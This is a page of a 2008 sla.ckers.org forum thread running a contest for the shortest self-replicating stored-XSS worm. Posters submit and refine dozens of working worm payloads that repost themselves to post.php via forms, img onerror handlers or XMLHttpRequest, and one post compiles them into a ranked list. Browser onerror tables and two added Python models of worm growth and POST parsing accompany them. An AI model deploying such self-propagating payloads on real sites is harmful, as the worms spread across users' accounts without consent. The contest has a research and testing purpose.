Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Current Page: 5 of 20
Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 05, 2008 09:50AM

@ronald, well, I assume the size optimization is being done because of a hypothetical character limit in the POST variable. So, if the next generation of the worm is the size of the entire page, that'll surely break it.

This is why the size of the largest descendant of the worm counts, not its original size (or just to keep it identical).

The problem with only submitting the JS is that you need to get hold of the JS itself first.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 05, 2008 10:09AM

Bollocks, you could just post a .js file then and be done with the contest. But document.body.form.innerHTML does the same, and is smaller. You only need to know what to submit.

I don't see the issue here, 'cause it does what the original specs from RSnake demanded.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 10:12AM

@Spikeman, what's the difference between yours and mine?


sirdarckcat Wrote:
-------------------------------------------------------
> ok, I'll show mine.. since almost all the tricks
> where revealed anyway..
>
> with(z)alert('XSS',submit(action=(method='post')+'
> .php',content.value=''+innerHTML.substr(0,148)))
>
> that's the rule-compliant version, of 159 bytes
>
> this is the small-not-portable-but-effective
> version of 145 bytes:
>
> with(z)alert('XSS',submit(action=(method='post')+'
> .php',content.value=''+innerHTML))
>
> Greetz!!

Spikeman Wrote:
-------------------------------------------------------
> 143 bytes:
>
> with(z)alert('XSS',submit(action=(method='post')+'
> .php',content.value=''+innerHTML))
>
> Tested in Firefox and IE, quotes are added to make
> name="content" second time and after. It worked
> fine with content around it in my tests so the
> substring was unnecessary.
>
> Edit: I guess the added quotes make this
> technically 145 but that's still the smallest, no?

¬¬

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 05, 2008 10:13AM

'Xcuse me for the double post, but I'd like to clarify it: this takes only the form contents; it can even be narrowed to the input itself.

<script>f.content.value=document.body.f.innerHTML+alert('xss');f.submit();</script>

81 chars.

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 05, 2008 10:34AM

I just hacked this together, with great help from Alex and other people's work; dunno if it's already posted:
[116 characters]

<form name=o action=post.php <img src=. onError=o.value=document.body.innerHTML+alert('xss');javascript:o.submit();>

@Ronald, I just read the rules; I thought you had to post to post.php. Yours 'just' submits to the current page, right? Still, nice one!

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 05, 2008 10:34AM

Sorry, I really should have been clearer, and I'll revise the rules so this is clearer. Let's say your script is 200 chars long because, theoretically, the reason we are doing this is to get past some char limit that we can't bypass. We can't use external scripts because it must be self contained.

So we must make something that replicates itself and fits within whatever char limit we are trying to beat. So if your worm is 200 chars to start with, assume a 200 char limit on the form you are submitting to. If it's 150 chars, assume a 150 char limit and so on. Requesting the entire page and submitting it would actually break in almost every real world example because it's additive. I submit my whole page, the next guy submits his which includes mine and so on. Eventually (and not too many nodes in the future) you'll hit size restrictions.

So, unfortunately, Ronald, your code, while smallest, will probably not work efficiently enough and ultimately isn't suitable for a winner. But fortunately you still have 5 days left.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 05, 2008 10:45AM

<form method=post action=post.php name=i><input name=content><script>content.value=document.body.i.innerHTML+alert('xss');i.submit();</script>

139 then, with a 139-char payload.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 05, 2008 10:47AM

Ah, screw it, I'm going to get drunk. See ya later, and good luck all.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 05, 2008 11:09AM

Oops.. @Spyware: POST must be set as the method; a form defaults to GET.


Here is my last one: 138 chars, full form.

<form method=post action=post.php name=i><input name=content><script>i.content.value=document.i.innerHTML+alert('xss');i.submit();</script>

Good luck guys, have fun! (it was 4 me) ^^

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 05, 2008 11:15AM

Ooops, that was retarded, it didn't replicate. I blame the booze!

141 bytes my friend:

<form method=post action=post.php name=i><input name=content><script>i.content.value=document.body.innerHTML+alert('xss');i.submit();</script>

OK, I'm out; I take this as my contribution.

Enjoy.



Edited 1 time(s). Last edit at 01/05/2008 11:31AM by Ronald.

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 05, 2008 11:17AM

Oops, thanks Ronald!

Characters: 149

<form method=POST name=content action=post.php <img src=. onError=content.value=document.content.innerHTML+alert('xss');javascript:content.submit();>

I wish they changed the form default action though :/

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 11:36AM

Spyware:
when it's replicated, your code will be like this:

<form method="POST" name="content" action="post.php"><img src="." onError="content.value=document.content.innerHTML+alert('xss');javascript:content.submit();">

160 bytes.

Ronald:
when it's replicated, your code will be like this:

<input name="content"><script>i.content.value=document.body.innerHTML+alert('xss');i.submit();</script>

and won't work.

RSnake:
If the size limit is the size of my payload, then this code will be the smallest:
<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</SCRIPT>

146 bytes

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/05/2008 11:39AM by sirdarckcat.
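rsnake's point above that copying the whole page is additive, and sirdarckcat's point that innerHTML hands unquoted attributes back with quotes added, turned into a size model. This is an added example, not code from the thread: the page template, the innerHTML stand-in and the three sample entries are constructed approximations of what the posts describe, and what it shows is how many generations each strategy survives a field capped at its own starting size (rule 3 as rsnake restated it).

```python
import re
from typing import Callable, List, Optional

# Constructed stand-in for the contest's post.php: the stored "content" is
# echoed back into the page unescaped, which every entry in the thread needs.
BODY_HEAD = "<h1>Guestbook</h1><p>Latest post:</p>"
BODY_TAIL = "<p>Powered by guestbook 0.1</p>"


def render(stored: str) -> str:
    """The page a victim loads after one worm generation has been stored."""
    return "<html><body>" + BODY_HEAD + stored + BODY_TAIL + "</body></html>"


# Crude model of innerHTML serialization: attribute values always come back
# double-quoted, so each unquoted attribute costs two extra bytes, and script
# text is left alone. Real browsers differ in detail (ma1 notes IE strips
# quotes again), which this model does not try to reproduce.
_UNQUOTED_ATTR = re.compile(r'(\s[A-Za-z-]+=)([^\s"\'>]+)')


def serialize(markup: str) -> str:
    head, sep, script = markup.partition("<script>")
    return _UNQUOTED_ATTR.sub(r'\1"\2"', head) + sep + script


def form_scoped_step(stored: str) -> str:
    """Next generation of an entry that submits '<form id=z>' + z.innerHTML.

    innerHTML omits the form's own start tag, so the worm re-adds it as a
    literal; the children come back re-serialized. The form is located by
    its id (rule 6), never by its position in the page.
    """
    page = render(stored)
    start = page.index("<form id=z>") + len("<form id=z>")
    end = page.index("</script>", start) + len("</script>")
    return "<form id=z>" + serialize(page[start:end])


def body_copy_step(stored: str) -> str:
    """Next generation of an entry that submits document.body.innerHTML:
    the whole body, page chrome included, which is what rsnake calls additive."""
    page = render(stored)
    body = page[page.index("<body>") + len("<body>"):page.index("</body>")]
    return serialize(body)


Step = Callable[[str], str]


def sizes(step: Step, gen0: str, generations: int) -> List[int]:
    """Byte length of generations 0..generations under the given step."""
    out, cur = [len(gen0)], gen0
    for _ in range(generations):
        cur = step(cur)
        out.append(len(cur))
    return out


def first_over_limit(step: Step, gen0: str, generations: int) -> Optional[int]:
    """Rule 3 as rsnake restated it: the field accepts at most len(gen0) bytes.
    Returns the first generation that no longer fits, or None if they all do."""
    for gen, size in enumerate(sizes(step, gen0, generations)):
        if size > len(gen0):
            return gen
    return None


# Constructed sample entries, modelled on (not copied from) the thread's ones.
FORM_UNQUOTED = ("<form id=z><input name=content><script>with(z)alert('XSS',"
                 "submit(action=(method='post')+'.php',"
                 "content.value='<form id=z>'+innerHTML))</script>")
# The same entry written the way innerHTML will serialize it, as the 146-byte
# entry above does with name="content": the fixed point is reached at gen 0.
FORM_QUOTED = FORM_UNQUOTED.replace("name=content", 'name="content"')
BODY_COPY = ("<form method=post action=post.php name=i><input name=content>"
             "<script>i.content.value=document.body.innerHTML;i.submit()</script>")


if __name__ == "__main__":
    for label, step, worm in [("form, unquoted", form_scoped_step, FORM_UNQUOTED),
                              ("form, pre-quoted", form_scoped_step, FORM_QUOTED),
                              ("whole body", body_copy_step, BODY_COPY)]:
        print(f"{label:17} sizes={sizes(step, worm, 4)} "
              f"first generation over own size: {first_over_limit(step, worm, 4)}")
```

The unquoted form entry grows once (two bytes for the requoted input) and then stabilizes, the pre-quoted one never grows, and the whole-body copy gains the page chrome on every generation.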

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 05, 2008 11:38AM

No it won't, read again.

Re: Diminutive XSS Worm Replication Contest
Posted by: barbarianbob
Date: January 05, 2008 11:40AM

171 bytes. Replicates with the same length.

<b><form id="f"><input name="content"><img src="" onerror="with(f)submit(alert('xss'),content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php')"></form></b>

@Spyware: setting the form name to content isn't working on my Firefox. It doesn't send the value to post.php. Sadly, I think <input name="content"> is a requirement for Firefox to send the data.



Edited 1 time(s). Last edit at 01/05/2008 11:42AM by barbarianbob.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 11:42AM

Ah yeah, you are right, I was reading this one:

<form method=post action=post.php name=i><input name=content><script>i.content.value=document.i.innerHTML+alert('xss');i.submit();</script>

Anyway, on yours you are assuming that your payload is the first thing in the document, and that won't be true in any attack.

there should be a post with all codes..

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/05/2008 11:43AM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 05, 2008 11:49AM

<form id=_><input name="content"><script>with(_)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(0,148)))</script>

I managed to slice 1 byte from sirdarckcat's rules-compliant entry (158 vs 159 total, 156 on IE because of quote stripping) ;)
Goodbye until the 10th, deadly deadlines are knocking on my door :(

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: Diminutive XSS Worm Replication Contest
Posted by: Alex
Date: January 05, 2008 11:52AM

As a side note: Rsnake pointed out the <img src> possibilities in IE7 before.

Did someone else mention that the dialog boxes don't pop up in the right order (counting from 1 to 8) in FF 2.0.0.11?
It says: 2, 4, 3, 7.

1<img src="/" onerror=alert(1)>FF2: no / IE7: yes / O: yes<br>
2<img src="." onerror=alert(2)>FF2: yes / IE7: yes / O: yes<br>
3<img src="" onerror=alert(3)>FF2: yes / IE7: yes / O: no<br>
4<img src=. onerror=alert(4)>FF2: yes / IE7: yes / O: yes<br>
5<img src=/ onerror=alert(5)>FF2: no / IE7: yes / O: yes<br>
6<img src= onerror=alert(6)>FF2: no / IE7: no / O: no<br>
7<img src onerror=alert(7)>FF2: yes / IE7: no / O: no<br>
8<img onerror=alert(8)>FF2: no / IE7: no / O: no

I used this code on two machines (Win XP / Vista) with the same result.

(Opera 9.25 added.)

---
~~Patching is for suckers~~

http://www.bitsploit.de



Edited 3 time(s). Last edit at 01/05/2008 12:14PM by Alex.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 12:15PM

So this is a list of all valid payloads.. if yours is missing, tell me.. if a payload here is not valid, tell me..

Places (not official, just to help everyone keep track):

.- ma1 (129) [requires the user to focus a field]
.- Spyware (132) [requires the user to focus a field]
.- Spikeman (132) [requires the user to focus a field DOCTYPE ISSUES]
.- .mario (142) <form> (with doctype issues)
.- Ronald (144) <form> (with doctype issues)
.- shawn (153) <form> (with doctype issues)
.- ma1 (156) <form> (with doctype issues)
.- sirdarckcat (158) <form> (with doctype issues)
.- sirdarckcat (160)
.- ma1 (163) <form>
.- ritz (167) <form>
.- barbarianbob (168) <form>
.- .mario (178)
.- Gareth Heyes (229) <form>
.- Matt Presson (233) <form>
.- digi7al64 (266) <form>
.- bwb labs 271 XHR
.- dev80 (doesn't work for Apache or IIS)

TopCodes [9]:

0.- ma1 (136) [requires user to focus a field]
<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+parentNode.innerHTML.slice(alert('xss'),132))">

1.- shawn (153) [doctype issues]
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',_[0].value='<form id=_>'+innerHTML.slice(alert('XSS'),143))</script>

2.- ma1 (156) [doctype issues]
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(alert('XSS'),147))</script>

1(or 3).- sirdarckcat (160)
<form><INPUT name="content"><IMG src="" onerror="with(z=parentNode)submit(action=(method='post')+'.php',z[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">

2.- ma1 (163)
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,157)))">

3(or 4).- ritz (167)
<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';type=value='<form>'+p.innerHTML.substr(0,161);submit()" type="image">

4.- bwb labs (168) [DOESN'T WORK FOR APACHE OR IIS]
<script>f=function(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>f="+f+";f()</sc"+"ript>"));};f()</script>

5.- barbarianbob (171)
<b><form id="f"><input name="content"><img src="" onerror="with(f)submit(alert('xss'),content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php')"></form></b>

6.- .mario (178) 
<b><img src="m" onerror="alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),submit()"><form method="post" action="post.php"><input name="content"></form></b>

7.- Gareth Heyes (229) [CAN BE REDUCED]
<script>(function(){alert('XSS');document.write('<form method=post action=post.php><input type=image onerror="form.submit()" src><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>')})()</script>

8.- Matt Presson (233) [CAN BE REDUCED]
<script>alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form method=post action=post.php name=f><input value='+encodeURI(a)+' name=content></form>');body.onload=function(){document.f.submit()}</script>

9.- digi7al64 (266) [CAN BE REDUCED]
<p id=e><script>alert('xss');var d=document;s='script>';p='<form method=post name=f action=post.php><input name=content value="+escape("<p id=e>"+d.getElementById(\'e\').innerHTML+"</p>")+"></form><'+s+'d.f.submit();</'+s;p='d.write("'+p+'");'; eval(p);</script></p>


RULES (from rsnake's post..)

1) must reside in UTF-8 or ISO-8859-1 encoding (nothing exotic please)
2) must self replicate the entire payload to a page called "post.php" as a parameter called "content" on the same domain (must be POSTed to that URL, no GETs please). We'll assume post.php will properly URL unescape your code.
3) must not grow in size after propagation (if your code starts off as n bytes, it must not grow to n+x)
4) must run as written (not just a parameter injection - we can infer how to turn it into a parameter injection later)
5) must not use anything from cookie or GET parameter space - every line of your code must reside on the page itself (mimicking stored XSS)
6) must not use knowledge of the DOM unless you name a class or an id and use the class or id. No looking for the n-th script on the page as that will change from site to site.
7) must work in at least Internet Explorer 7.0 and Firefox 2.x
8) must have a payload of "XSS" in an alert box


ALL CODES ~~ maybe there are some codes that don't work, I only tested the smaller ones

sirdarckcat 160
<form><INPUT name="content"><IMG src="" onerror="with(z=parentNode)submit(action=(method='post')+'.php',z[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">

bwb labs 271 XHR
<img src='' alt="alert('XSS');var x=new XMLHttpRequest;x.open('post','post.php');x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');x.send('content='+encodeURIComponent('<img src=\'\' alt=\x22'+alt+'\x22 onerror=\'eval(alt)\'>'))" onerror='eval(alt)'>

Spikeman 132 DOCTYPE ISSUES REQUIRES USER INTERACTION
<form id=i><button onclick="i.action=(i.method='post')+'.php';value='<form id=i>'+i.innerHTML;alert('XSS')" name="content"></button>

Ronald 144 DOCTYPE ISSUES
<form id=_><input name='content'><script>_[0].value='<form id=_>'+_.innerHTML;alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>

.mario 142 DOCTYPE ISSUES
<form><input id="i" name="content"><script>with(i.form)submit(alert('XSS'),action=(method='post')+'.php',i.value='<form>'+innerHTML)</script>

Spyware 132 REQUIRES USER INTERACTION
ý<form action="post.php" method="post"><input name="content" onfocus="alert('xss');value=body.innerHTML.slice(/ý.*/);submit();"></form>

OLD ONES (still valid)
== Gareth Heyes ==

<script>(function(){alert('XSS');document.write('<form method=post action=post.php><input type=image onerror="form.submit()" src><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>')})()</script>

229 bytes

== digi7al64 ==

<div id=d><script>alert('xss');p='<form method=post name=f action=post.php><input type=text name=content value="+encodeURI("<div id=d>"+document.getElementById(\'d\').innerHTML+"</div>")+" /></form><script>document.f.submit();</script'+'>';p='document.write("'+p+'");';eval(p);</script></div>

292 bytes 

<div id=e><script>alert('xss');var d=document;s='script>';p='<form method=post name=f action=post.php><input name=content value="+encodeURI("<div id=e>"+d.getElementById(\'e\').innerHTML+"</div>")+"></form><'+s+'d.f.submit();</'+s;p='d.write("'+p+'");'; eval(p);</script></div>

277 bytes 

<p id=e><script>alert('xss');var d=document;s='script>';p='<form method=post name=f action=post.php><input name=content value="+escape("<p id=e>"+d.getElementById(\'e\').innerHTML+"</p>")+"></form><'+s+'d.f.submit();</'+s;p='d.write("'+p+'");'; eval(p);</script></p>

266 bytes

== Matt Presson ==

<script>alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form method=post action=post.php name=f><input value='+encodeURI(a)+' name=content></form>');body.onload=function(){document.f.submit()}</script>

233 bytes

== ritz ==

<i><img src="/" onerror="alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()"><form method=post action=post.php><input name=content></form></i>

194 bytes

<s><img src=. onerror="alert('xss');f=this.nextSibling;f.firstChild.value='<s>'+this.parentNode.innerHTML+'</s>';f.submit()"><form method="post" action="post.php"><input name="content"></form></s>

196 bytes

<b><img src="." onerror="alert('xss');with(this.nextSibling)firstChild.value=parentNode.innerHTML.bold(),submit()"><form method="post" action="post.php"><input name="content"></form></b>

186 bytes

<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';type=value='<form>'+p.innerHTML.substr(0,161);submit()" type="image">

167 bytes

== ma1 ==

<b><img src="." onerror="alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),submit()"><form method="post" action="post.php"><input name="content"></form></b>

183 bytes

<b><form method="post" action="post.php"><img src="." onerror="alert('xss');with(this.parentNode)content.value=parentNode.innerHTML.bold(),submit()"><input name="content"></form></b>

182 bytes

<b><img onerror="alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()" src=""><form><input name="content"></form></b>

180 bytes

** works without doctype **

<form id=_><input name="content"><script>with(_)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(0,148)))</script>

158 bytes

== bwb labs ==

<b><img onerror="alert('xss');n=(m=this.parentNode).lastChild;n[0].value='<b>'+m.innerHTML+'</b>';n.submit()" src=""><form action="post.php" method="post"><input name="content"></form></b>

189 bytes

** not sure it works **

<script>f=function(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>f="+f+";f()</sc"+"ript>"));};f()</script>

168 bytes

== .mario ==

<b><img src="m" onerror="alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),submit()"><form method="post" action="post.php"><input name="content"></form></b>

178 bytes

== barbarianbob ==

<b><form action="post.php" method="post"><img src="." onerror="alert('xss');with(parentNode)content.value=parentNode.innerHTML.bold(),submit()"><input name="content"></form></b>

177 bytes

** works without doctype **

<b><form id="f"><input name="content"><img src="" onerror="with(f)submit(alert('xss'),content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php')"></form></b>

171 bytes

== sirdarckcat ==

<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),155))">

161 bytes

** works without doctype **

<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML.slice(0,148)))</SCRIPT>

158 bytes

PS. ma1 is my master

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 36 time(s). Last edit at 01/06/2008 12:35PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 05, 2008 12:21PM

@sirdarckcat

yeah that's what I said from the start, what should I assume then? now I killed my whole saturday finding out in the end that some things are not allowed. And also: what page requests a POSTED variable without a form? no page does that so a vector without a form is also valid! That's why I said that 80 chars would be a minimum if the form is present, you see.

Stupid rules, because it's about replicating the worm and we all proved that it can be done in under 200 chars. Now I'm reminded why I never join contests, I guess it's going back to that mindset.

Re: Diminutive XSS Worm Replication Contest
Posted by: Alex
Date: January 05, 2008 12:22PM

Sorry, had to add some more possibilities and browsers (new: Safari 3.04 Beta, Windows (Vista)):

0<img src=\ onerror=alert(0)>FF2: no / IE7: yes / O: yes / S: yes<br>
1<img src="/" onerror=alert(1)>FF2: no / IE7: yes / O: yes / S: yes<br>
2<img src="." onerror=alert(2)>FF2: yes / IE7: yes / O: yes / S: yes<br>
3<img src="" onerror=alert(3)>FF2: yes / IE7: yes / O: no / S: no<br>
4<img src=. onerror=alert(4)>FF2: yes / IE7: yes / O: yes / S: yes<br>
5<img src=/ onerror=alert(5)>FF2: no / IE7: yes / O: yes / S: yes<br>
6<img src= onerror=alert(6)>FF2: no / IE7: no / O: no / S: no<br>
7<img src onerror=alert(7)>FF2: yes / IE7: no / O: no / S: no<br>
8<img onerror=alert(8)>FF2: no / IE7: no / O: no / S: no<br>
9<img src="\" onerror=alert(9)>FF2: no / IE7: yes / O: yes / S: yes

Safari is funny ... It fires: 0, 9, 5, 2, 4.

---
~~Patching is for suckers~~

http://www.bitsploit.de

Re: Diminutive XSS Worm Replication Contest
Posted by: Torstein
Date: January 05, 2008 12:23PM

Using Opera 9.23 and IE 6.0.2900.2180 (XP Pro, SP2)

1<img src="/" onerror=alert(1)>FF2: no / IE7: yes / Opera: yes / IE6: yes
2<img src="." onerror=alert(2)>FF2: yes / IE7: yes / Opera: yes / IE6: yes
3<img src="" onerror=alert(3)>FF2: yes / IE7: yes / Opera: no / IE6: yes
4<img src=. onerror=alert(4)>FF2: yes / IE7: yes / Opera: yes / IE6: yes
5<img src=/ onerror=alert(5)>FF2: no / IE7: yes / Opera: yes / IE6: yes
6<img src= onerror=alert(6)>FF2: no / IE7: no / Opera: no / IE6: no
7<img src onerror=alert(7)>FF2: yes / IE7: no / Opera: no / IE6: no
8<img onerror=alert(8)>FF2: no / IE7: no / Opera: no / IE6: no

The order of the boxes is logical in Opera. In IE, it seems random (???).

Edit: I tested, ate dinner, and then posted. So I got the Opera result independently.



Edited 1 time(s). Last edit at 01/05/2008 12:27PM by Torstein.

Re: Diminutive XSS Worm Replication Contest
Posted by: Alex
Date: January 05, 2008 12:34PM

I only tested IE7. IE7's order is also logical.

And then I wrote this for FF 2.0.0.11:
2<img src="." onerror=alert('Please, ')>FF2: yes / IE7: yes / O: yes / S: yes<br>
3<img src="" onerror=alert('tell')>FF2: yes / IE7: yes / O: no / S: no<br>
4<img src=. onerror=alert('me')>FF2: yes / IE7: yes / O: yes / S: yes<br>
7<img src onerror=alert('more!')>FF2: yes / IE7: no / O: no / S: no<br>
So it should talk to me in a wrong sentence and it does, but I had to delete the space between , and ' in the first line. Otherwise FF leaves it out. Huh!?

Sorry for being a little bit off topic, but I thought that I should mention it 'cause of Rsnake's summary on page 2.

---
~~Patching is for suckers~~

http://www.bitsploit.de



Edited 3 time(s). Last edit at 01/05/2008 12:38PM by Alex.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 12:42PM

Ronald Wrote:
-------------------------------------------------------
> @sirdarckcat
>
> yeah that's what I said from the start, what
> should I assume then? now I killed my whole
> saturday finding out on the end that some things
> are not allowed. And also: what page requests a
> POSTED variable without a form? no page does that
> so a vector without a form is also valid! That's
> why I said that 80 chars would be a minimum if the
> form is present, you see.
>
> Stupid rules, because it's about replicating the
> worm and we all proved that it can be done in
> under 200 chars. Now I'm reminded why I never join
> contests, I guess it's going back to that mindset.

yeah, I know.. but.. we don't have a form, rsnake said so..
6) must not use knowledge of the DOM unless you name a class or an id and use the class or id. No looking for the n-th script on the page as that will change from site to site.

At least if there's a form, you don't know how to refer to it.

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: dev80
Date: January 05, 2008 12:43PM

145 bytes, someone needs to double check that I didn't overlook something. Seems to work in both FF2 and IE7:

<script>function p() {
x=new XMLHttpRequest;
x.open("post","past.htm");
x.send("content=<script>" + p.valueOf() + "p()<\/script>");
}p()</script>

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 12:45PM

dev80:
you don't have the payload; test it, are you sure $_POST['content'] receives the value?

anyway it can be reduced.. and you are missing the payload

<script>function p(){with(XMLHttpRequest)open("post","past.php"),send("content=<script>"+p.valueOf(alert('xss'))+"p()<\/script>")}p()</script>
142 bytes

anyway, you need the addRequestHeader I think, I'm not really sure.. and maybe you need to encode the payload..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/05/2008 12:49PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 05, 2008 12:45PM

fuck it, screw the rules.

I got 141 bytes running here, and it does what the rules first implied namely: self replication. But who cares, I'm done with this bullshit.

Re: Diminutive XSS Worm Replication Contest
Posted by: dev80
Date: January 05, 2008 12:49PM

@sirdarckcat: According to LiveHTTPHeaders the data gets sent in the request body. Didn't double check in IE, but I will. Small update to reflect the proper CGI name.

<script>function p() {
x=new XMLHttpRequest;
x.open("post","post.php");
x.send("content=<script>" + p.valueOf() + "p()<\/script>");
}p()</script>

Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 05, 2008 12:50PM

Just in case the "body/doctype" assumptions required by most of the entries following Sirdarckcat's former winner (including my own) were invalid, here's a fully DOM agnostic one:
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,157)))">

163 bytes in its longest, FF+IE compatible version.

With 1 more byte you can catch Opera and Safari too:
<form><INPUT name="content"><IMG src="/" onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,158)))">

And that's really all from me until Thursday...
Cheers

P.S.: sirdarckcat, I love u :P

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 12:51PM

dev80

you are still missing the payload

the header is server dependent.. but not on all servers, rsnake has to explain on which servers this has to work..

anyway..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat
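The header question raised in this post, and the "maybe you need to encode the payload" remark a few posts earlier, seen from the server side. This is an added Python example, not from the thread: post_fields models the documented PHP rule that $_POST is only filled for form-encoded bodies (multipart is left out), and the request bodies are constructed.

```python
from urllib.parse import parse_qs, quote


def post_fields(content_type, body):
    """Fields a PHP-style server exposes as $_POST for a given request body.

    PHP fills $_POST only for application/x-www-form-urlencoded (and
    multipart/form-data, not modelled here). Any other Content-Type, or none,
    leaves $_POST empty even though the raw body arrived, so an XHR entry
    that never sets the header depends on what the client sends by default.
    """
    media_type = (content_type or "").split(";")[0].strip().lower()
    if media_type != "application/x-www-form-urlencoded":
        return {}
    # Percent-escapes are decoded and '+' becomes a space, as form posts
    # expect; a body that was not encoded pays for that in the stored copy.
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


# Constructed requests: the same small payload sent encoded and not encoded.
PAYLOAD = "<b>1+1</b>"
ENCODED_BODY = "content=" + quote(PAYLOAD, safe="")
RAW_BODY = "content=" + PAYLOAD
FORM_TYPE = "application/x-www-form-urlencoded"

if __name__ == "__main__":
    print(post_fields(FORM_TYPE, ENCODED_BODY))  # {'content': '<b>1+1</b>'}
    print(post_fields(FORM_TYPE, RAW_BODY))      # {'content': '<b>1 1</b>'}, the '+' is gone
    print(post_fields(None, RAW_BODY))           # {}, nothing is parsed without the header
```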

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 12:54PM

ma1: yeah I love me too hehe

<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),155))">
161 bytes!

ouch!
this is almost as fun as hacking php-ids

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 01/05/2008 01:02PM by sirdarckcat.
